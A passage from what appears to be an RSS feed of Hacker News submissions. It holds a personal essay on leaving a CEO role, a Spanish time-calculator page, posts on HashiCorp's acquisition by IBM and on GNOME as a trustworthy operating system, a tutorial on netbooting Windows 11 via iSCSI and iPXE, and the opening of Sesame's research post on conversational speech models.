    The numbers were tracked like an excel-sheet religion: invest everything, max the 401ks, watch the dollars march up-and-to-the-right. Always up, always right -the sacred direction of success.

    Go go go.

    The decades blurred. Each milestone triggered a new hunger—what felt like 'enough' at 25 was a joke at 30. What seemed impossible at 35 was inevitable by 40.

    The faster I ran, the faster I could run.

    Never did I really stop to question the obsession, the burning need to accumulate. The voice in my head just constantly whispering 'more.'

    Until last year, I came up a bit for air. 

    By any normal relative measure, I'd 'made it'—I climbed from a 20-something worker bee to the C-suite at a billion dollar company, landed my dream gig as CEO, first at The Hustle and later at Hampton, building teams and a track record I was actually really proud of. 

    And Hampton was the dream—we had immediate distribution, solid backing, a chance to build the kind of community I knew founders craved.

    I was surrounded by smart and ambitious people, & watching our numbers explode: zero to nearly $10M, a hundred members to a thousand, all in two years flat.

    The kind of rocket ship every CEO dreams of.

    On paper, this was it—the crown jewel, the peak, the final job I'd ride into the sunset.

    But success has a funny way of showing you what you're willing to sacrifice for it.

    The all-or-nothing personality that made me good at my job was starting to steal from everywhere else. 

    To me, it was obvious: there were no more dog walks with the wife, no coaching my son's flag football team, and long gone were bedtime stories and my presence on the weekends.

    Even my texts had a ruthless priority system: work first, everything else, whenever. 

    Each small surrender added up to a larger absence.

    The irony was clear: I was a good CEO on my way to being great, and I was a great father on my way to being good.

    Two arrows moving in opposite directions.

    But walking away from Hampton felt insane - this was the dream CEO job, as good as it gets.

    This was literally the kind of opportunity my Dad—who worked six days a week his entire life—would have killed for.

    Leaving something so good felt like betraying his legacy, turning my back on generations of pushing forward at all costs.

    It felt like a fuck you to all the grinding, all the hustling that had come before me.

    But as I sat with it longer, a different truth emerged...

    My Dad was quite literally counting down the days until his retirement.

    Not because he didn't love hard work, but because he loved being a father more.

    If he'd had my chances, my opportunities, he would've closed his practice in a heartbeat. He would have grabbed his recently-discounted YMCA card, his bedside table full of DIY health books, and he’d never look back.

    And here I was, staring at my beautiful life—amazing kids still young enough to want me around, a healthy wife, an aging mom who won't be here forever—and suddenly it felt crazy not to walk away.

    The real dishonor would be missing the lesson my Dad's death taught me: truly, there is no promise of tomorrow.

    That if given the opportunity to chill out a bit, to coach my son's team, to walk my daughter to the bus, to be more calm, more present, more proactive with the people I adore most in my life... if given that opportunity, you better fucking take it.

    That each day is a gift.

    And that I don't need another up-and-to-the-right chart, I just need time.

    ]]>
    https://www.jordandipietro.com/article/up-and-to-the-right hacker-news-small-sites-43205307 Fri, 28 Feb 2025 13:25:00 GMT
    <![CDATA[Calculadora de Horas Online – Suma Tiempo Fácilmente]]> thread link) | @lyqtzs
    February 28, 2025 | https://calculadora-de-horas.net/es | archive.org

    Herramienta gratuita para calcular el tiempo total de sus actividades diarias, incluyendo horas trabajadas y extras

    ¿Cómo usar la calculadora de tiempo?

    Ingrese las horas y minutos en los campos correspondientes.

    La calculadora sumará automáticamente los tiempos ingresados.

    Utilice el botón "Agregar tiempo" para más entradas.

    El resultado total se actualizará instantáneamente.

    Características Principales

    • Cálculo automático de horas y minutos.
    • Múltiples entradas de tiempo para adaptarse a diferentes turnos y tareas.
    • Interfaz fácil de usar para una rápida entrada de datos.
    • Ideal para el control de horas de trabajo y horas extras.
    • Suma el tiempo con precisión para una gestión eficiente del trabajo y los descansos.
    • Capacidad de ajustar la visualización en horas, minutos o formato total.

    La calculadora de tiempo ofrece una forma rápida y práctica de sumar su tiempo, ya sea para trabajo o actividades personales. Con ella, puede calcular horas trabajadas y horas extras con precisión, optimizando su gestión del tiempo.

    Herramientas Relacionadas

    Preguntas Frecuentes sobre la Calculadora de Horas

    ¿Qué es una Calculadora de Horas?

    La Calculadora de Horas es una herramienta indispensable para quienes desean seguir y calcular el tiempo invertido en sus actividades diarias, especialmente en el contexto laboral. Permite calcular de forma sencilla el total de horas trabajadas, incluyendo horas extras, garantizando mayor precisión en el control de su jornada.

    ¿Cómo Funciona la Calculadora?

    Nuestra Calculadora de Horas fue diseñada para hacer que el cálculo del tiempo de trabajo sea más fácil y preciso. Solo debe ingresar las horas y minutos de inicio y fin de cada actividad o turno, y el programa hará todo el trabajo automáticamente por usted. ¡No más cálculos manuales! La herramienta calcula el tiempo de forma rápida, precisa y sin errores, haciendo el proceso más conveniente y sin complicaciones.

    Beneficios de Usar la Calculadora

    • Seguimiento de Jornada: Monitorear el tiempo de trabajo es esencial para garantizar que no exceda sus límites diarios o semanales.
    • Cálculo de Horas Extras: Si trabaja más allá de su horario habitual, la Calculadora de Horas ayuda a calcular con precisión el total de horas extras realizadas.
    • Organización y Planificación: Mantener un control de las horas trabajadas puede ayudarle a planificar mejor su rutina, equilibrando su vida profesional y personal.

    ¿Por Qué Usar Nuestra Herramienta de Cálculo de Horas?

    Además de ser totalmente gratuita, nuestra Calculadora de Horas fue diseñada para ser simple e intuitiva. No necesita ser un experto en matemáticas para usarla, ya que realiza todo el cálculo automáticamente. Si es trabajador autónomo, freelancer o empleado, nuestra herramienta puede ser un gran aliado en la gestión de su tiempo.

    ¿Cómo Acceder a la Calculadora de Horas?

    Para usar nuestra calculadora, solo acceda directamente a https://calculadora-de-horas.net . ¡Es rápido y fácil! Si lo encuentra útil, no olvide compartirlo con sus amigos y colegas para que también puedan disfrutar de esta práctica herramienta.

    ]]>
    https://calculadora-de-horas.net/es hacker-news-small-sites-43205156 Fri, 28 Feb 2025 13:04:39 GMT
    <![CDATA[HashiCorp Lost Its Way]]> thread link) | @sausagefeet
    February 28, 2025 | https://terrateam.io/blog/hashicorp-lost-its-way/ | archive.org

    IBM acquires HashiCorp. End of an era?

    Yesterday, February 27, 2025, it was announced that IBM had finished acquiring HashiCorp. HashiCorp is now an IBM company. In many ways, it feels like the end of an era.

    To me, HashiCorp felt like the dream. Not working there, but building the company. A smart and innovative software developer builds a successful developer tools company, hits a double digit billion dollar valuation at one point, and retires to learn to fly airplanes.

    The vibe on Hacker News does not feel like a celebration. Being swallowed by IBM is not the victory people would have predicted when HashiCorp IPO’d.

    In the developer world, IBM does not come to mind when we think of tools we love. Despite IBM’s work in open source, it feels like a company built for executives by executives.

    IBM has done a great job of maintaining its value over the years. It may not be as exciting as a FAANG stock, but as of this writing, it still has a market cap of a quarter trillion dollars. How will having access to all those resources impact HashiCorp?

    HashiCorp lost its way

    The truth is, while I respect all of the work HashiCorp has done, Terrateam would not exist as it does right now without HashiCorp, I think most people feel HashiCorp lost its way a while ago.

    Switching to Resources Under Management (RUM) pricing felt like the first attempt to squeeze money out of customers without giving them a better experience.

    Then, rather than competing on innovation, HashiCorp gave up on its open source roots, the thing that made it the dominant player it became, and switched its products to the source-available BUSL license. That opened a lot of people’s eyes to the new reality. HashiCorp was trying to win by shutting down competition instead of building something better.

    Open source stepped in

    A lot of us competing with HashiCorp got together and forked Terraform, creating OpenTofu, a drop-in replacement. OpenTofu has been adding features while keeping compatibility with Terraform. It is part of the Linux Foundation, making it a true community-driven open source tool.

    Terraform is not the only HashiCorp tool that got forked. OpenBao was forked from Vault.

    Will HashiCorp start innovating again?

    Now that it is part of IBM, will HashiCorp start innovating again? I am skeptical. That is just not what IBM is known for, and HashiCorp did not have a culture of innovation at the time of the acquisition.

    What this means for Terrateam

    At Terrateam, we find the acquisition interesting from a historical perspective, but it never really felt like it impacted us. Our product has always taken a different approach to managing infrastructure than HashiCorp.

    If you love the Terrateam product, then you probably would not be a devout Terraform Cloud user anyway. It would take a huge pivot to compete with the workflow Terrateam gives users.

    Terrateam has always been dedicated to fair, transparent, and honest pricing. Combined with recently going open source, we are just on a different path than either HashiCorp alone or HashiCorp under IBM.

    I think that in its attempt to capture more value, HashiCorp has given up its position as a leader in developer tooling. Yes, its tools will be used for years to come, but the next big tool won’t come from them and the next great features in Terraform and Vault space won’t come from them. The king is dead, long live the king’s legacy.

    ]]>
    https://terrateam.io/blog/hashicorp-lost-its-way/ hacker-news-small-sites-43204794 Fri, 28 Feb 2025 12:18:54 GMT
    <![CDATA[Prosthetics That Don't Betray]]> thread link) | @thibaultamartin
    February 28, 2025 | https://ergaster.org/posts/2025/02/28-prosthetics-that-dont-betray/ | archive.org

    Tech takes a central place in our lives. Banking, and administrative tasks are happening more and more online. It’s becoming increasingly difficult to get through life without a computer or a smartphone. They have become external organs necessary to live our life.

    Steve Jobs called the computer the bicycle for the mind. I believe computers & smartphones have become prosthetics, extensions of people that should unconditionally and entirely belong to them. We must produce devices and products the general public can trust.

    Microsoft, Google and Apple are three American companies that build the operating systems our computers, phones, and servers run on. This American hegemony on ubiquitous devices is dangerous both for all citizens worldwide, especially under an unpredictable, authoritarian American administration.

    Producing devices and an operating system for them is a gigantic task. Fortunately, it is not necessary to start from zero. In this post I share what I think is the best foundation for a respectful operating system and how to get it into European, and maybe American, hands. In a follow-up post I will talk more about distribution channels for older devices.

    The rest of the world matters

    In this post I take a European-centric view. The rest of the world matters, but I am not familiar with what their needs are nor how to address them.

    We’re building prosthetics

    Prosthetics are extension of ourselves as individuals. They are deeply personal. We must ensure our devices & products are:

    • Transparent about what they do. They must not betray people and do things behind their backs. Our limbs do what we tell them. When they don’t, it’s considered a problem and we go to a physician to fix it.
    • Intuitive, documented, accessible and stable. People shouldn’t have to re-learn how to do things they were used to doing. When they don’t know how to do something, it must be easy for them to look it up or find someone to explain it to them. The devices must also be accessible and inclusive to reduce inequalities, instead of reinforcing them. Those requirements are a social matter, not a technical one.
    • Reliable, affordable, and repairable. Computers & smartphones must not allow discrimination based on social status and wealth. Everyone must have access to devices they can count on, and be able to maintain them in a good condition. This is also a social problem and not a technical one. It is worth noting that “the apps I need must be available for my system” is an often overlooked aspect of reliability, and “I don’t have to install the system because it’s bundled with my machine” is an important aspect of affordability.

    I believe that the GNOME project is one of the best placed to answer those challenges, especially when working in coordination with the excellent postmarketOS people who work on resurrecting older devices abandoned by their manufacturers. There is real stagnation in the computing industry that we must see as a social opportunity.

    A screenshot of the GNOME desktop, with the accent color set to orange. Several apps are open, and their primary UI element are colored in orange.

    Constraints are good

    GNOME is a computing environment aiming for simplicity and efficiency. Its opinionated approach benefits both users and developers:

    • From the user perspective, apps look and feel consistent and sturdy, and are easy to use thanks to well thought out defaults.
    • From the developer perspective, the opinionated human interface guidelines let them develop simpler, more predictable apps with less edge cases to test for.

    GNOME is a solid foundation to build respectful tech. It doesn’t betray people by doing things behind their back. It aims for simplicity and stability, although it could use some more user research to back design decisions if there was funding to do so, like this has successfully been the case for GNOME 40.

    Mobile matters

    GNOME’s Human Interface Guidelines and development tooling make it easy to run GNOME apps on mobile devices. Some volunteers are also working on making GNOME Shell (the “desktop” view) render well on mobile devices.

    A screenshot of GNOME on a mobile phone. It has three apps open on the top third, and an app grid taken the bottom two thirds.

    postmarketOS already offers it as one of the UIs you can install on your phone. With mobile taking over traditional computers usage, it is critical to consider the mobile side of computing too.

    Hackability and safety

    As an open source project, GNOME remains customizable by advanced users who know they are bringing unsupported changes, can break their system in the process, and deal with it. It doesn’t make customization easy for those advanced users, because it doesn’t optimize for them.

    The project also has its fair share of criticism, some valid, and some not. I agree that sometimes the project can be too opinionated and rigid, optimizing for extreme consistency at the expense of user experience. For example, while I agree that system trays are suboptimal, they’re also a pattern people have been used to it for decades and removing them is very frustrating for many.

    But some criticism is also coming from people who want to tinker with their system and spend countless hours building a system that’s the exact fit for their needs. Those are valid use cases, but GNOME is not built to serve them. GNOME aims to be easy to use for the general public, which includes people who are not tech-experts and don’t want to be.

    We’re actually building prototypes

    As mighty as the GNOME volunteers might be, there is still a long way before the general public can realistically use it. GNOME needs to become a fully fledged product shipped on mainstream devices, rather than an alternative system people install. It also needs to involve representatives of the people it intends to serve.

    You just need to simply be tech-savvy

    GNOME is not (yet) an end user product. It is a desktop environment that needs to be shipped as part of a Linux distribution. There are many distributions to chose from. They are not shipping the same version of GNOME, and some patch it more or less heavily. This kind of fragmentation is one of the main factors holding the Linux desktop back.

    A screenshot of the gnome.org website about how to get GNOME. It reads \

    The general public doesn’t want to have to pick a distribution and bump into every edge cases that creates. They need a system that works predictably, that lets them install the apps they need, and that gives them safe ways to customize it as a user.

    That means they need a system that doesn’t let them shoot themselves in the foot in the name of customizability, and that prevents them from doing some things unless they sign with their blood that they know it could make it unusable. I share Adrian Vovk’s vision for A Desktop for All and I think it’s the best way to productize GNOME and make it usable by the general public.

    People don’t want to have to install an “alternative” system. They want to buy a computer or a smartphone and use it. For GNOME to become ubiquitous, it needs to be shipped on devices people can buy.

    For GNOME to really take off, it needs to become a system people can use both in their personal life and at work. It must become a compelling product in entreprise deployments, both to route enough money towards development and maintenance, to make it an attractive platform for vendors to build software for, and to make it an attractive platform for devices manufacturers to ship.

    What about the non tech-savvy?

    GNOME aims to build a computing platform everyone can trust. But it doesn’t have a clear, scalable governance model with representatives of those it serves. GNOME has rudimentary governance to define what is part of the project and what is not thanks to its Release Team, but it is largely a do-ocracy as highlighted in the Governance page of GNOME’s Handbook as well was in GNOME Designer Tobias Bernard’s series Community Power.

    A do-ocracy is a very efficient way to onboard volunteers and empower people who can give away their free time to get things done fast. It is however not a great way to get work done on areas that matter to a minority who can’t afford to give away free time or pay someone to work on it.

    The GNOME Foundation is indeed not GNOME’s vendor today, and it doesn’t contribute the bulk of the design and code of the project. It maintains the infrastructure (technical and organizational) the project builds on. A critical, yet little visible task.

    A screenshot of the GNOME Developers website where people can learn to build, design, or distribute for GNOME

    To be a meaningful, fair, inclusive project for more than engineers with spare time and spare computers, the project needs to improve in two areas:

    1. It needs a Product Committee to set a clear product direction so GNOME can meaningfully address the problems of its intended audience. The product needs a clear purpose, a clear audience, and a robust governance to enforce decisions. It needs a committee with representatives of the people it intends to serve, designers, and solution architects. Of course it also critically needs a healthy set of public and private organizations funding it.
    2. It needs a Development Team to implement the direction the committee has set. This means doing user research and design, technical design, implementing the software, doing advocacy work to promote the project to policymakers, manufacturers, private organizations’ IT department and much more.

    Bikeshedding is a real risk

    A Product Committee can be a useful structure for people to express their needs, draft a high-level and realistic solution with designers and solution architects, and test it. Designers and technical architects must remain in charge of designing and implementing the solution.

    The GNOME Foundation appears as a natural host for these organs, especially since it’s already taking care of the assets of the project like its infrastructure and trademark. A separate organization could more easily pull the project in a direction that serves its own interests.

    Additionally, the GNOME Foundation taking on this kind of work doesn’t conflict with the present do-ocracy, since volunteers and organizations could still work on what matters to them. But it would remain a major shift in the project’s organization and would likely upset some volunteers who would feel that they have less control over the project.

    I believe this is a necessary step to make the public and private sector invest in the project, generate stable employment for people working on it, and ultimately make GNOME have a systemic, positive impact on society.

    GNOME needs solution architects

    The GNOME community has designers who have a good product vision. It is also full of experts on their module, but has a shortage of people with a good technical overview of the project, who can turn product issues into technical ones at the scale of the whole project.

    So what now?

    “The year of the Linux desktop” has become a meme now for a reason. The Linux community, if such a nebulous thing exists, is very good at solving technical problems. But building a project bigger than ourselves and putting it in the hands of the millions of people who need it is not just a technical problem.

    Here are some critical next steps for the GNOME Community and Foundation to reclaim personal computing from the trifecta of tech behemoths, and fulfill an increasingly important need for democracies.

    Learn from experience

    Last year, a team of volunteers led by Sonny Piers and Tobias Bernard wrote a grant bid for the Sovereign Tech Fund, and got granted €1M. There are some major takeaways from this adventure.

    At risk of stating the obvious, money does solve problems! The team tackled significant technical issues not just for GNOME but for the free desktop in general. I urge organizations and governments that take their digital independence seriously to contribute meaningfully to the project.

    Finally and unsurprisingly, one-offs are not sustainable. The Foundation needs to build sustainable revenue streams from a diverse portfolio to grow its team. A €1M grant is extremely generous from a single organization. It was a massive effort from the Sovereign Tech Agency, and a significant part of their 2024 budget. But it is also far from enough to sustain a project like GNOME if every volunteer was paid, let alone paid a fair wage.

    Tread carefully, change democratically

    Governance and funding are a chicken and egg problem. Funders won’t send money to the project if they are not confident that the project will use it wisely, and if they can’t weigh in on the project’s direction. Without money to support the effort, only volunteers can set up the technical governance processes on their spare time.

    Governance changes must be done carefully though. Breaking the status quo without a plan comes with significant risks. It can demotivate current volunteers, make the project lose tractions for newcomers, and die before enough funding makes it to the project to sustain it. A lot of people have invested significant amounts of time and effort into GNOME, and this must be treated with respect.

    Build a focused MVP

    For the STF project, the GNOME Foundation relied on contractors and consultancies. To be fully operational and efficient it must get in a position of hiring people with the most critical skills. I believe right now the most critical profile is the solution architect one. With more revenue, developers and designers can join the team as it grows.

    But for that to happen, the Foundation needs to:

    1. Define who GNOME is for in priority, bearing in mind that “everyone” doesn’t exist.
    2. Build a team of representatives of that audience, and a product roadmap: what problems do these people have that GNOME could solve, how could GNOME solve it for them, how could people get to using GNOME, and what tradeoffs would they have to make when using GNOME.
    3. Build the technical roadmap (the steps to make it happen).
    4. Fundraise to implement the roadmap, factoring in the roadmap creation costs.
    5. Implement, and test

    The Foundation can then build on this success and start engaging with policymakers, manufacturers, vendors to extent its reach.

    Alternative proposals

    The model proposed has a significant benefit: it gives clarity. You can give money to the GNOME Foundation to contribute to the maintenance and evolution of GNOME project, instead of only supporting its infrastructure costs. It unlocks the possibility to fund user research that would also benefit all the downstreams.

    It is possible to take the counter-point and argue that GNOME doesn’t have to be an end-user product, but should remain an upstream that several organizations use for their own product and contribute to.

    The “upstream only” model is status-quo, and the main advantage of this model is that it lets contributing organizations focus on what they need the most. The GNOME Foundation would need to scale down to a minimum to only support the shared assets and infrastructure of the project and minimize its expenses. Another (public?) organization would need to tackle the problem of making GNOME a well integrated end-user product.

    In the “upstream only” model, there are two choices:

    • Either the governance of GNOME itself remains the same, a do-ocracy where whoever has the skills, knowledge and financial power to do so can influence the project.
    • Or the Community can introduce a more formal governance model to define what is part of GNOME and what is not, like Python PEPs and Rust’s RFCs.

    It’s an investment

    Building an operating system usable by the masses is a significant effort and requires a lot of expertise. It is tempting to think that since Microsoft, Google and Apple are already shipping several operating systems each, that we don’t need one more.

    However, let’s remember that these are all American companies, building proprietary ecosystems that they have complete control over. In these uncertain times, Europe must not treat the USA as a direct enemy, but the current administration makes it clear that it would be reckless to continue treating it as an ally.

    Building an international, transparent operating system that provides an open platform for people to use and for which developers can distribute apps will help secure EU’s digital sovereignty and security, at a cost that wouldn’t even make a dent in the budget. It’s time for policymakers to take their responsibilities and not let America control the digital public space.

    ]]>
    https://ergaster.org/posts/2025/02/28-prosthetics-that-dont-betray/ hacker-news-small-sites-43204755 Fri, 28 Feb 2025 12:13:33 GMT
    <![CDATA[Netboot Windows 11 with iSCSI and iPXE]]> thread link) | @terinjokes
    February 28, 2025 | https://terinstock.com/post/2025/02/Netboot-Windows-11-with-iSCSI-and-iPXE/ | archive.org

    A fictious screenshot of a permanent ban from a game, in the Windows 95 installer style, with a 90s-era PC and a joystick in the left banner. The text is titled "Permanent Suspension" and reads "Your account has been permanently suspended due to the use of unauthorized Operating Systems or unauthorized virtual machines. This type of behavior causes damage to our community and the game's competitive integrity. This action will not be reversed."

    Purposefully ambiguous and fictious permanent ban.

    (created with @foone’s The Death Generator)

    My primary operating system is Linux: I have it installed on my laptop and desktop. Thanks to the amazing work of the WINE, CodeWeavers, and Valve developers, it’s also where I do PC gaming. I can spin up Windows in a virtual machine for the rare times I need to use it, and even pass through a GPU if I want to do gaming.

    There is one pretty big exception: playing the AAA game ████████████████ with friends. Unfortunately, the developer only allows Windows. If you attempt to run the game on Linux or they detect you’re running in a virtual machine, your device and account are permanently banned. I would prefer not to be permanently banned.

    For the past several years my desktop has also had a disk dedicated to maintaining a Windows install. I’d prefer to use the space in my PC case1 for disks for Linux. Since I already run a home NAS, and my Windows usage is infrequent, I wondered if I could offload the Windows install to my NAS instead. This lead me down the course of netbooting Windows 11 and writing up these notes on how to do a simplified “modern” version.

    My first task was determining how to get a computer to boot from a NAS. My experience with network block devices is with Ceph RBD, where a device is mounted into an already running operating system. For booting over an Ethernet IP network the standard is iSCSI. A great way to boot from an iSCSI disk is with iPXE. To avoid any mistakes during this process, I removed all local drives from the system.2

    I didn’t want to run a TFTP server on my home network, or reconfigure DHCP to provide TFTP configuration. Even if I did, the firmware for my motherboard is designed for “gamers”, there’s no PXE ROM. I can enable UEFI networking and a network boot option appears in the boot menu, but no DHCP requests are made3. Fortunately, iPXE is available as bootable USB image, which loaded and started trying to fetch configuration from the network.

    Hitting ctrl-b as directed on screen to drop to the iPXE shell, I could verify basic functionality was working.

    iPXE 1.21.1+ (e7585fe) -- Open Source Network Boot Firmware -- https://ipxe.org
    Features: DNS FTP HTTP HTTPS iSCSI NFS TFTP VLAN SRP AoE EFI Menu
    iPXE> dhcp
    Configuring (net0 04:20:69:91:C8:DD)...... ok
    iPXE> show ${net0/ip}
    192.0.2.3
    

    I decided to use tgt as the iSCSI target daemon on my NAS4 as the configuration seemed the least complicated. In /etc/tgt/targets.conf I configured it with two targets: one as the block device I wanted to install Windows onto and the other being the installation ISO.

    <target iqn.2025-02.com.example:win-gaming>
        backing-store /dev/zvol/zroot/sans/win-gaming
        params thin-provisioning=1
    </target>
    
    <target iqn.2025-02.com.example:win11.iso>
        backing-store /opt/isos/Win11_24H2_English_x64.iso
        device-type cd
        readonly 1
    </target>
    

    Back on the PC, I could tell iPXE to use these iSCSI disks, then boot onto the DVD. As multiple network drives are being added, each must be given a different drive ID starting from 0x80.

    iPXE> sanhook --drive 0x80 iscsi:nas.example.com:::1:iqn.2025-02.com.example:win-gaming
    Registered SAN device 0x80
    iPXE> sanhook --drive 0x81 iscsi:nas.example.com:::1:iqn.2025-02.com.example:win11.iso
    Registered SAN device 0x81
    iPXE> sanboot --drive 0x81
    Booting from SAN device 0x81
    

    After a minute of the Windows 11 logo and a spinner, the Windows 11 setup appears. In an ideal situation, I could immediately start installing. Unfortunately, the Windows 11 DVD does not ship drivers for my network card, and the iSCSI connection information passed to the booted system from iPXE couldn’t be used. I’m a bit impressed the GUI loaded at all, instead of just crashing.

    To rectify this, I would need to build a Windows PE image that included my networking drivers. WinPE is the minimal environment used when installing Windows. Fortunately, Microsoft has made this pretty easy nowadays. I downloaded and installed the Windows Assessment and Deployment Kit and the Windows PE add-on. After running “Deployment and Imaging Tools Environment” as an administrator, I could make a folder containing a base WinPE image.

    > mkdir C:\winpe
    > copype amd64 C:\winpe\amd64
    

    After mounting the image, I was able to slipstream the Intel drivers. I searched through the inf files to find the folder that supported my network card.

    > imagex /mountrw C:\winpe\amd64\media\sources\boot.wim C:\winpe\amd64\mount
    > dism /image:C:\winpe\amd64\mount /add-driver /driver:C:\temp\intel\PRO1000\Winx64\W11\
    > imagex /unmount /commit C:\winpe\amd64\mount
    

    This new image is what we need to boot into to install Windows. As my NAS is also running an HTTP server, I copied over the files relevant to netbooting: from “C:‍\winpe\amd64\media” I copied “boot/BCD”, “boot/boot.sdi”, and “sources/boot.wim”, preserving the folders. I also downloaded wimboot to the same directory.

    You can use iPXE to execute a script fetched with HTTP, which I took advantage of to reduce the amount of typing I’ll need to do at the shell. I saved the following script as “install.ipxe” in the same HTTP directory.

    #!ipxe
    
    sanhook --drive 0x80 iscsi:nas.example.com:::1:iqn.2025-02.com.example:win-gaming
    sanhook --drive 0x81 iscsi:nas.example.com:::1:iqn.2025-02.com.example:win11.iso
    kernel wimboot
    initrd boot/BCD BCD
    initrd boot/boot.sdi boot.sdi
    initrd sources/boot.wim boot.wim
    boot
    

    Rebooting back to the iPXE prompt I could then boot using this script.

    iPXE> dhcp
    iPXE> chain http://nas.example.com/ipxe/install.ipxe
    

    After a few seconds I was booted into WinPE with a Command Prompt. The command “wpeinit” ran automatically, configuring the network card and mounting the iSCSI disks. I found the DVD had been mounted as drive “D”, and could start the Windows Setup with “D:‍\setup.exe”.

    However, after reaching the “Searching for Disks” screen the installer closed itself without any error. This seems to be a bug with the new version of setup, as restarting it and selecting the “Previous Version of Setup” on an earlier page used a version of the installer that worked.

    The installation was spread across several restarts. Fortunately, once the installation files are copied over, nothing but the main disk image is required, reducing what I needed to type in the iPXE shell. The HTTP server could also be cleaned up at this point.

    iPXE> dhcp
    iPXE> sanboot iscsi:nas.example.com:::1:iqn.2025-02.com.example:win-gaming
    

    After several more minutes, and a forced installation of a Windows zero-day patch, I was greeted by a Windows 11 desktop, booted over iSCSI. Task Manager even reports the C drive as being “SDD (iSCSI)”.

    Booting from a USB stick and typing into an iPXE prompt every time I want to boot into Windows isn’t a great user experience. Fortunately, iPXE is also available as an EFI application which can be installed to the local EFI System Partition. I also discovered that iPXE will execute commands provided on the command line.

    I reinstalled the disks used for Linux, copied over ipxe.efi to the EFI System Partition, and added a new entry to systemd-boot by creating “$ESP/loader/entries/win11.conf”

    title Windows 11 (iPXE)
    efi /ipxe/ipxe.efi
    options prompt && dhcp && sanboot iscsi:nas.example.com:::1:iqn.2025-02.com.example:win-gaming
    

    There seems to be a bug where the first word in the options field is ignored.5 I used a valid iPXE command prompt, which also provides a clear signal should it ever start being interpreted in the future version.

    After a little bit of extra setup (installing Firefox and switching to dark mode), I was able to install Steam and the game. The game took a little bit longer to install due the slower disk speed over my network (time to upgrade to 10GbE?), but there was no noticeable delay during normal gameplay. I didn’t see any network saturation or high disk latencies in Task Manager during loading.

    ]]>
    https://terinstock.com/post/2025/02/Netboot-Windows-11-with-iSCSI-and-iPXE/ hacker-news-small-sites-43204604 Fri, 28 Feb 2025 11:47:52 GMT
    <![CDATA[Crossing the uncanny valley of AI conversational voice]]> thread link) | @nreece
    February 28, 2025 | https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice | archive.org

    February 27, 2025

    Brendan Iribe, Ankit Kumar, and the Sesame team

    How do we know when someone truly understands us? It is rarely just our words—it is in the subtleties of voice: the rising excitement, the thoughtful pause, the warm reassurance.

    Voice is our most intimate medium as humans, carrying layers of meaning through countless variations in tone, pitch, rhythm, and emotion.

    Today’s digital voice assistants lack essential qualities to make them truly useful. Without unlocking the full power of voice, they cannot hope to effectively collaborate with us. A personal assistant who speaks only in a neutral tone has difficulty finding a permanent place in our daily lives after the initial novelty wears off.

    Over time this emotional flatness becomes more than just disappointing—it becomes exhausting.

    Achieving voice presence

    At Sesame, our goal is to achieve “voice presence”—the magical quality that makes spoken interactions feel real, understood, and valued. We are creating conversational partners that do not just process requests; they engage in genuine dialogue that builds confidence and trust over time. In doing so, we hope to realize the untapped potential of voice as the ultimate interface for instruction and understanding.

    Key components

    • Emotional intelligence: reading and responding to emotional contexts.
    • Conversational dynamics: natural timing, pauses, interruptions and emphasis.
    • Contextual awareness: adjusting tone and style to match the situation.
    • Consistent personality: maintaining a coherent, reliable and appropriate presence.

    We’re not there yet

    Building a digital companion with voice presence is not easy, but we are making steady progress on multiple fronts, including personality, memory, expressivity and appropriateness. This demo is a showcase of some of our work in conversational speech generation. The companions shown here have been optimized for friendliness and expressivity to illustrate the potential of our approach.

    Conversational voice demo

    1. Microphone permission is required. 2. Calls are recorded for quality review but not used for ML training and are deleted within 30 days. 3. By using this demo, you are agreeing to our Terms of Use and Privacy Policy. 4. We recommend using Chrome (Audio quality may be degraded in iOS/Safari 17.5).

    Technical post

    Authors

    Johan Schalkwyk, Ankit Kumar, Dan Lyth, Sefik Emre Eskimez, Zack Hodari, Cinjon Resnick, Ramon Sanabria, Raven Jiang

    To create AI companions that feel genuinely interactive, speech generation must go beyond producing high-quality audio—it must understand and adapt to context in real time. Traditional text-to-speech (TTS) models generate spoken output directly from text but lack the contextual awareness needed for natural conversations. Even though recent models produce highly human-like speech, they struggle with the one-to-many problem: there are countless valid ways to speak a sentence, but only some fit a given setting. Without additional context—including tone, rhythm, and history of the conversation—models lack the information to choose the best option. Capturing these nuances requires reasoning across multiple aspects of language and prosody.

    To address this, we introduce the Conversational Speech Model (CSM), which frames the problem as an end-to-end multimodal learning task using transformers. It leverages the history of the conversation to produce more natural and coherent speech. There are two key takeaways from our work. The first is that CSM operates as a

    single-stage model, thereby improving efficiency and expressivity. The second is our

    evaluation suite, which is necessary for evaluating progress on contextual capabilities and addresses the fact that common public evaluations are saturated.

    Background

    One approach to modeling audio with transformers is to convert continuous waveforms into discrete audio token sequences using tokenizers. Most contemporary approaches ([1], [2]) rely on two types of audio tokens:

    1. Semantic tokens: Compact speaker-invariant representations of semantic and phonetic features. Their compressed nature enables them to capture key speech characteristics at the cost of high-fidelity representation.
    2. Acoustic tokens: Encodings of fine-grained acoustic details that enable high-fidelity audio reconstruction. These tokens are often generated using Residual Vector Quantization (RVQ) [2]. In contrast to semantic tokens, acoustic tokens retain natural speech characteristics like speaker-specific identity and timbre.

    A common strategy first models semantic tokens and then generates audio using RVQ or diffusion-based methods. Decoupling these steps allows for a more structured approach to speech synthesis—the semantic tokens provide a compact, speaker-invariant representation that captures high-level linguistic and prosodic information, while the second-stage reconstructs the fine-grained acoustic details needed for high-fidelity speech. However, this approach has a critical limitation; semantic tokens are a bottleneck that must fully capture prosody, but ensuring this during training is challenging.

    RVQ-based methods introduce their own set of challenges. Models must account for the sequential dependency between codebooks in a frame. One method, the delay pattern (figure below) [3], shifts higher codebooks progressively to condition predictions on lower codebooks within the same frame. A key limitation of this approach is that the time-to-first-audio scales poorly because an RVQ tokenizer with N codebooks requires N backbone steps before decoding the first audio chunk. While suitable for offline applications like audiobooks, this delay is problematic in a real-time scenario.

    Example of delayed pattern generation in an RVQ tokenizer with 4 codebooks

    Conversational Speech Model

    CSM is a multimodal, text and speech model that operates directly on RVQ tokens. Inspired by the RQ-Transformer [4], we use two autoregressive transformers. Different from the approach in [5], we split the transformers at the zeroth codebook. The first multimodal backbone processes interleaved text and audio to model the zeroth codebook. The second audio decoder uses a distinct linear head for each codebook and models the remaining N – 1 codebooks to reconstruct speech from the backbone’s representations. The decoder is significantly smaller than the backbone, enabling low-latency generation while keeping the model end-to-end.

